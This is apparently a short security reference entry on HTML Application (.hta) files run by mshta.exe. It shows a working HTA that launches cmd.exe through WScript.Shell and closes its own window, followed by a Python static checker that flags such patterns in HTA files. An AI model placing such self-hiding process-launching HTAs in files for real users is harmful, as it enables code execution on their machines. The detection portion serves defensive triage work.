An HTML Application (HTA) is an HTML page with the .hta suffix that is supported by Internet Explorer (and Edge) through mshta.exe. An endpoint that runs untrusted HTAs can be used to gain remote code execution.
To run Windows commands in an HTA:
<html>
<head>
<script>
var c = 'cmd.exe'; // command to launch
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>
self.close(); // close the extra window (mshta.exe)
</script>
</body>
</html>
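A static triage check for the pattern shown above, as an added example that is not part of the original page: it extracts the script blocks from an HTA and flags ActiveX objects that can launch processes, the launch call itself, and the self-closing window. The ProgID list, finding labels, and function and class names are assumptions of this example.

```python
import re
from html.parser import HTMLParser

# ProgIDs that give script access to process creation or the file system.
# Assumed list for this example, not an exhaustive inventory.
RISKY_PROGIDS = {"wscript.shell", "shell.application", "scripting.filesystemobject"}
ACTIVEX_RE = re.compile(
    r"(?:new\s+ActiveXObject|CreateObject)\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
RUN_RE = re.compile(r"\.\s*(?:Run|Exec|ShellExecute)\s*\(", re.I)
CLOSE_RE = re.compile(r"\b(?:self|window)\s*\.\s*close\s*\(", re.I)

# Sample input: the page's snippet, condensed.
SAMPLE = """<html><head><script>
var c = 'cmd.exe'; new ActiveXObject('WScript.Shell').Run(c);
</script></head><body><script>self.close();</script></body></html>"""

class ScriptExtractor(HTMLParser):
    """Collects the text inside every <script> element."""
    def __init__(self):
        super().__init__()
        self.in_script, self.chunks = False, []
    def handle_starttag(self, tag, attrs):
        self.in_script = (tag == "script")
    def handle_endtag(self, tag):
        self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.chunks.append(data)

def triage_hta(text):
    """Return sorted findings for one HTA's source text."""
    parser = ScriptExtractor()
    parser.feed(text)
    parser.close()
    code = "\n".join(parser.chunks)  # only script content is inspected
    findings = {"activex:" + p.lower() for p in ACTIVEX_RE.findall(code)
                if p.lower() in RISKY_PROGIDS}
    if RUN_RE.search(code):
        findings.add("process-launch-call")
    if CLOSE_RE.search(code):
        findings.add("self-closing-window")
    return sorted(findings)

if __name__ == "__main__":
    print(triage_hta(SAMPLE))
```

String matching of this kind is a first-pass filter for quarantined attachments or downloads; obfuscated or encoded script will not match and needs separate handling.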